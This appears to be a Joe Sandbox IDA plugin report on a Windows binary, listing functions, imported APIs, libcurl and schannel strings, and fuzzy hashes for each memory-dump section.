schannel: Empty DNS name., xrefs: 00007FF7F1DE94BC

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: AddressCertHandleModuleNameProcString
String ID: 2.5.29.17$schannel: CertFindExtension() returned no extension.$schannel: CryptDecodeObjectEx() returned no alternate name information.$schannel: Empty DNS name.$schannel: Not enough memory to list all host names.$schannel: Null certificate context.$schannel: Null certificate info.
API String ID: 4138448956-2160583098
Opcode ID: 2242bc0ed434ca2dc1ebd2ba583190439e4d238d5e87145ac37762e9d122868d
Instruction ID: 04082857d81ee4424aa756113deb4263700c43424cd610d79e34b335e1d8315c
Opcode Fuzzy Hash: 2242bc0ed434ca2dc1ebd2ba583190439e4d238d5e87145ac37762e9d122868d
Instruction Fuzzy Hash: 4451BE26A0974281EB1CAF01A4602ADB770BB84B99FD48131DE6E037D8DFBCE445C391

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA0C74 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 69COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DA0D9C

Strings

%4I64dP, xrefs: 00007FF7F1DA0D8D
%4I64dk, xrefs: 00007FF7F1DA0CA2
%2I64d.%0I64dG, xrefs: 00007FF7F1DA0D18
%4I64dT, xrefs: 00007FF7F1DA0D80
%5I64d, xrefs: 00007FF7F1DA0C89
%2I64d.%0I64dM, xrefs: 00007FF7F1DA0CBD
%4I64dM, xrefs: 00007FF7F1DA0CF7
%4I64dG, xrefs: 00007FF7F1DA0D64

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
API String ID: 1488884202-2102732564
Opcode ID: b84edea642b1bcae355f1b7feebe49c5b6dde67c4707f370d7fcafed3e67bde2
Instruction ID: df0ff1cbea08a845baddc076b13de932dc694ef3a8c02fee601b1a78cbc2d06c
Opcode Fuzzy Hash: b84edea642b1bcae355f1b7feebe49c5b6dde67c4707f370d7fcafed3e67bde2
Instruction Fuzzy Hash: ED214A52E09A4B52FF14E799A410BF882305B847C0FC44532E83E06BD7DFEDB68682E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAF458 Relevance: 14.5, APIs: 1, Strings: 6, Instructions: 2276COMMON

Download Yara Rule

Strings

SESS, xrefs: 00007FF7F1DB0F1A
ignoring failed cookie_init for %s, xrefs: 00007FF7F1DB1056
ALL, xrefs: 00007FF7F1DB0EAA
FLUSH, xrefs: 00007FF7F1DB0FDF
RELOAD, xrefs: 00007FF7F1DB1001
Set-Cookie:, xrefs: 00007FF7F1DB113F

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID: ALL$FLUSH$RELOAD$SESS$Set-Cookie:$ignoring failed cookie_init for %s
API String ID: 0-3179978524
Opcode ID: a57bdd88991d34b424dd8bc290a644bb890760003a0c993fa800d3274b4d58e6
Instruction ID: 02ffe4bdd0a0f56e2e9d37d97cc702fbecb5dfe91894c4d720eac0fdff13d363
Opcode Fuzzy Hash: a57bdd88991d34b424dd8bc290a644bb890760003a0c993fa800d3274b4d58e6
Instruction Fuzzy Hash: ED23C632A0D642A5E769EE2CA04437EA6F4FB04748FA84135C66F467D5CFBDB542C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB88D8 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 359stringCOMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 00007FF7F1DB898B
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DB8DDE

Strings

%s://%s, xrefs: 00007FF7F1DB897D
file, xrefs: 00007FF7F1DB8A98, 00007FF7F1DB8DC3
http, xrefs: 00007FF7F1DB8ABF
https, xrefs: 00007FF7F1DB8B01
Switched from HTTP to HTTPS due to HSTS => %s, xrefs: 00007FF7F1DB8B90
Protocol "%s" not supported or disabled in libcurl, xrefs: 00007FF7F1DB8E9C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _scwprintfstrtoul
String ID: %s://%s$Protocol "%s" not supported or disabled in libcurl$Switched from HTTP to HTTPS due to HSTS => %s$file$http$https
API String ID: 1031268025-4054226901
Opcode ID: 16191fe47cb0b803dfca3e1fdf1ef362561513f19bb76281d435c4603169ac62
Instruction ID: 288f37caa26e9c5ad4aa6e9bb17bef0e4e1cacc8654d82585d80af9a7338e29e
Opcode Fuzzy Hash: 16191fe47cb0b803dfca3e1fdf1ef362561513f19bb76281d435c4603169ac62
Instruction Fuzzy Hash: 66F1A432A0878295EB14EB26D4506F9A7B1EF55B88F844436CE2E4B7D5DFBCE501C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DDF4E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32 ref: 00007FF7F1DDF53D
CryptCreateHash.ADVAPI32 ref: 00007FF7F1DDF563
CryptHashData.ADVAPI32 ref: 00007FF7F1DDF57A
CryptGetHashParam.ADVAPI32 ref: 00007FF7F1DDF59A
CryptGetHashParam.ADVAPI32 ref: 00007FF7F1DDF5C1
CryptDestroyHash.ADVAPI32 ref: 00007FF7F1DDF5D0
CryptReleaseContext.ADVAPI32 ref: 00007FF7F1DDF5E1

Strings

@, xrefs: 00007FF7F1DDF52C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
String ID: @
API String ID: 3606780921-2766056989
Opcode ID: eef22464055f357fe991cc84f11a53eb23bc5e3b34a884466998c4ac4d9a1e0b
Instruction ID: ee82f10c3f16185539f4719e3c5c1feb7f267907f6ab7c101044f7fcf1edd0e4
Opcode Fuzzy Hash: eef22464055f357fe991cc84f11a53eb23bc5e3b34a884466998c4ac4d9a1e0b
Instruction Fuzzy Hash: AA315E22B0465286F714DF61E8447BDAB71BB88B89F848835DE1D57E88CFBCD145C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DC2C88 Relevance: 13.8, APIs: 1, Strings: 8, Instructions: 306COMMON

Download Yara Rule

APIs

atoi.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DC2F28

Strings

HEAD, xrefs: 00007FF7F1DC309A
Maximum (%ld) redirects followed, xrefs: 00007FF7F1DC30EF
Clear auth, redirects to port from %u to %u, xrefs: 00007FF7F1DC2F50
Switch to %s, xrefs: 00007FF7F1DC30BA
GET, xrefs: 00007FF7F1DC30A1
Issue another request to this URL: '%s', xrefs: 00007FF7F1DC3030
Clear auth, redirects scheme from %s to %s, xrefs: 00007FF7F1DC2FA3
Switch from POST to GET, xrefs: 00007FF7F1DC3133

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: atoi
String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s
API String ID: 657269090-1748258277
Opcode ID: ff120324ba9403fc776b31a34ac807d608e073747f27a45686f60ac2633eeed9
Instruction ID: a5fd1ce7a8b44cff471450aa3cc3d5d8f5bd3b3aa20b4b99064c3ea6a926164f
Opcode Fuzzy Hash: ff120324ba9403fc776b31a34ac807d608e073747f27a45686f60ac2633eeed9
Instruction Fuzzy Hash: EFD1BF32A0868395E714FB2594506B9A7F1EF88B88F880835DD2D577E5CFB8E441C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DE4D1C Relevance: 13.5, Strings: 10, Instructions: 971COMMON

Download Yara Rule

Strings

WDigest, xrefs: 00007FF7F1DE4F1C, 00007FF7F1DE501A
NTLM handshake failure (empty type-2 message), xrefs: 00007FF7F1DE5B99
GSSAPI handshake failure (invalid security layer), xrefs: 00007FF7F1DE5559
Unsupported SASL authentication mechanism, xrefs: 00007FF7F1DE5378
GSSAPI handshake failure (empty security message), xrefs: 00007FF7F1DE5456, 00007FF7F1DE5818
DIGEST-MD5 handshake failure (empty challenge message), xrefs: 00007FF7F1DE4EF8
GSSAPI handshake failure (invalid security data), xrefs: 00007FF7F1DE550B, 00007FF7F1DE58C0
=, xrefs: 00007FF7F1DE4EB1
schannel: InitializeSecurityContext failed: %s, xrefs: 00007FF7F1DE5198
SSPI: couldn't get auth info, xrefs: 00007FF7F1DE4F34

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID: =$DIGEST-MD5 handshake failure (empty challenge message)$GSSAPI handshake failure (empty security message)$GSSAPI handshake failure (invalid security data)$GSSAPI handshake failure (invalid security layer)$NTLM handshake failure (empty type-2 message)$SSPI: couldn't get auth info$Unsupported SASL authentication mechanism$WDigest$schannel: InitializeSecurityContext failed: %s
API String ID: 0-2043923688
Opcode ID: 2717936f915b78dc6edcd5d1d51e7e95852a8ae789f8366be48666d97513c568
Instruction ID: 29d92b43006c6eb8602c4185069f77f2311281d90898098a58fcf6d53c220393
Opcode Fuzzy Hash: 2717936f915b78dc6edcd5d1d51e7e95852a8ae789f8366be48666d97513c568
Instruction Fuzzy Hash: 22A26036A08B4686EB18EF65D4902ADB7B0FB48789F808135DE2E47794DFBCE414C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DCCBDC Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 407COMMON

Download Yara Rule

Strings

WDigest, xrefs: 00007FF7F1DCCC4E, 00007FF7F1DCCFCF
Digest, xrefs: 00007FF7F1DCCBE8
digest_sspi: MakeSignature failed, error 0x%08lx, xrefs: 00007FF7F1DCCED8
schannel: InitializeSecurityContext failed: %s, xrefs: 00007FF7F1DCD1D3
SSPI: couldn't get auth info, xrefs: 00007FF7F1DCCC6F

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID: Digest$SSPI: couldn't get auth info$WDigest$digest_sspi: MakeSignature failed, error 0x%08lx$schannel: InitializeSecurityContext failed: %s
API String ID: 0-2436749399
Opcode ID: 2a5a99bfd0a92872fb976d69f0cbad93f89190c7f32708fac90c229b458bbe87
Instruction ID: 543f920a8c68a535baf57be71b4837258a887b1fb5b4de05dfd1bf945699933c
Opcode Fuzzy Hash: 2a5a99bfd0a92872fb976d69f0cbad93f89190c7f32708fac90c229b458bbe87
Instruction Fuzzy Hash: 49127136A09B4686EB14EF25D4402A9B7B0FB48B89F904435DE6E037A8DFBCE455C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DEB8E4 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7F1DEB900
RtlCaptureContext.KERNEL32 ref: 00007FF7F1DEB92D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7F1DEB947
RtlVirtualUnwind.KERNEL32 ref: 00007FF7F1DEB988
IsDebuggerPresent.KERNEL32 ref: 00007FF7F1DEB9DC
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7F1DEB9FD
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7F1DEBA08

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 4f2c18be13e5319f265db4d8e366183014555f152333f998b8544a05bee3f441
Instruction ID: 9e91eafcba6c1607a1632dc5bde32fae57dbad711b7ea2aba5274c0cf2beaba5
Opcode Fuzzy Hash: 4f2c18be13e5319f265db4d8e366183014555f152333f998b8544a05bee3f441
Instruction Fuzzy Hash: 5C314F72609A818AEB649F60E8403EDB374FB84745F84843ADA5D47BD8DFB8D648C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D91AB0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 111COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1D91AFE
fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D91BD9

Strings

-=O=-, xrefs: 00007FF7F1D91B0A
#, xrefs: 00007FF7F1D91BCF
%*s, xrefs: 00007FF7F1D91AE9

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_lfputs
String ID: #$%*s$-=O=-
API String ID: 2972761690-742414071
Opcode ID: e0f3c137f3f633e4654859a412c2d647b3a759afbe71d52922b3f3b1b0653e4d
Instruction ID: f8be1c7479bda036809198a4e663d1aa3b07a0a01d7ebb29e4540d59a5cbabcd
Opcode Fuzzy Hash: e0f3c137f3f633e4654859a412c2d647b3a759afbe71d52922b3f3b1b0653e4d
Instruction Fuzzy Hash: BE41F2327291818BEB9CDB28E984768B7A1F748744F905235EB5983FD8DB3CE524CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DE9C20 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34encryptionCOMMON

Download Yara Rule

APIs

CryptGetHashParam.ADVAPI32 ref: 00007FF7F1DE9C49
CryptGetHashParam.ADVAPI32 ref: 00007FF7F1DE9C6C
CryptDestroyHash.ADVAPI32 ref: 00007FF7F1DE9C7B
CryptReleaseContext.ADVAPI32 ref: 00007FF7F1DE9C8B

Strings

, xrefs: 00007FF7F1DE9C4F

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: Crypt$Hash$Param$ContextDestroyRelease
String ID:
API String ID: 2110207923-3916222277
Opcode ID: 91e91ab008b767c8f05ef04f45e93c4004cb4d75842f0d656781fabd1f371227
Instruction ID: ea60fb131ac11ad809949360f6e7be17fe44c6f44ec808ca9ebbf0538ac4dc70
Opcode Fuzzy Hash: 91e91ab008b767c8f05ef04f45e93c4004cb4d75842f0d656781fabd1f371227
Instruction Fuzzy Hash: 0901BC36A1564082EB18EF60D454378B370FB84F9AF848831DA1D02698CFBCD944C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D93434 Relevance: 7.6, APIs: 5, Instructions: 53processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.API-MS-WIN-CORE-TOOLHELP-L1-1-0 ref: 00007FF7F1D93474
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1D93483
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7F1D934A1
Module32First.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-2 ref: 00007FF7F1D934D3
Module32Next.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-2 ref: 00007FF7F1D934FD

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: Module32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32
String ID:
API String ID: 3822340588-0
Opcode ID: 49c6dfc2acd4c87636d5ca94b473e4b984134c6ac036ba5c13ff0e5f5ffd9ce1
Instruction ID: cb5e942b662a412f24da8968ab7ece3e4de857e8810aa4f97f9e8061ae8b4d7d
Opcode Fuzzy Hash: 49c6dfc2acd4c87636d5ca94b473e4b984134c6ac036ba5c13ff0e5f5ffd9ce1
Instruction Fuzzy Hash: 6511C62570C64251EB24BB25E488379A3B1BF88BA1FC44334C97D02AD5CFBCE1448790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DE64F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32 ref: 00007FF7F1DE650C
CryptCreateHash.ADVAPI32 ref: 00007FF7F1DE6534
CryptReleaseContext.ADVAPI32 ref: 00007FF7F1DE6543

Strings

@, xrefs: 00007FF7F1DE64FC

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: Crypt$Context$AcquireCreateHashRelease
String ID: @
API String ID: 4045725610-2766056989
Opcode ID: 24fa187fc953c2109e7e0e3cc39247c607dc63ec20b91a2c3c8db8bc80e0a134
Instruction ID: 076ecc35d799f04f4c993a00600894b248f8a3849db2a5e9daa07b2c669f0ed1
Opcode Fuzzy Hash: 24fa187fc953c2109e7e0e3cc39247c607dc63ec20b91a2c3c8db8bc80e0a134
Instruction Fuzzy Hash: 9CF0E921B1891282F7749B31E800B36A370EB94B46F84C030CA5D876C8DFBCE0469B61

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DE6570 Relevance: 6.0, APIs: 4, Instructions: 34encryptionCOMMON

Download Yara Rule

APIs

CryptGetHashParam.ADVAPI32 ref: 00007FF7F1DE6599
CryptGetHashParam.ADVAPI32 ref: 00007FF7F1DE65BC
CryptDestroyHash.ADVAPI32 ref: 00007FF7F1DE65CB
CryptReleaseContext.ADVAPI32 ref: 00007FF7F1DE65DB

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: Crypt$Hash$Param$ContextDestroyRelease
String ID:
API String ID: 2110207923-0
Opcode ID: 7780f7c2c0372b06f82a33d2c26906732b6f38dfd8a46c9ad699e4595bf9f30a
Instruction ID: 7b2f79faee9175c41fd660d6fd1be3aa6200e9fe15a2ddc5124a828192f23095
Opcode Fuzzy Hash: 7780f7c2c0372b06f82a33d2c26906732b6f38dfd8a46c9ad699e4595bf9f30a
Instruction Fuzzy Hash: 8C017C3661564086EB18DF21D448379B731FB84F96F948831DA1D03698CFBCD948C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DE9BD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32 ref: 00007FF7F1DE9BEC
CryptCreateHash.ADVAPI32 ref: 00007FF7F1DE9C0D

Strings

@, xrefs: 00007FF7F1DE9BDC

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: Crypt$AcquireContextCreateHash
String ID: @
API String ID: 1914063823-2766056989
Opcode ID: f28ce8f2b2c7489b8206fc3d31480ca9e750317407cdf0dae748bc20fa13d9e8
Instruction ID: 85cbaad3c25994835483bc4bf1f5fedf3c6c9eb0e3c0056c9c18c859f1a63950
Opcode Fuzzy Hash: f28ce8f2b2c7489b8206fc3d31480ca9e750317407cdf0dae748bc20fa13d9e8
Instruction Fuzzy Hash: 6DE0D861B2455283F7709B71E801F16A3A0EB88749F848030CE4C4BA54DF7CC1868B64

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DDF310 Relevance: 4.5, APIs: 3, Instructions: 35encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32 ref: 00007FF7F1DDF340
CryptGenRandom.ADVAPI32 ref: 00007FF7F1DDF359
CryptReleaseContext.ADVAPI32 ref: 00007FF7F1DDF36D

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 84b6eab3dac30dd0c7db40f185ccc60bab2d407ff4ed9a95af4507aa3cac41ab
Instruction ID: ddfa0557aa4de27255ed94e54a99225e012597cee7e28278da768f4131ac5f34
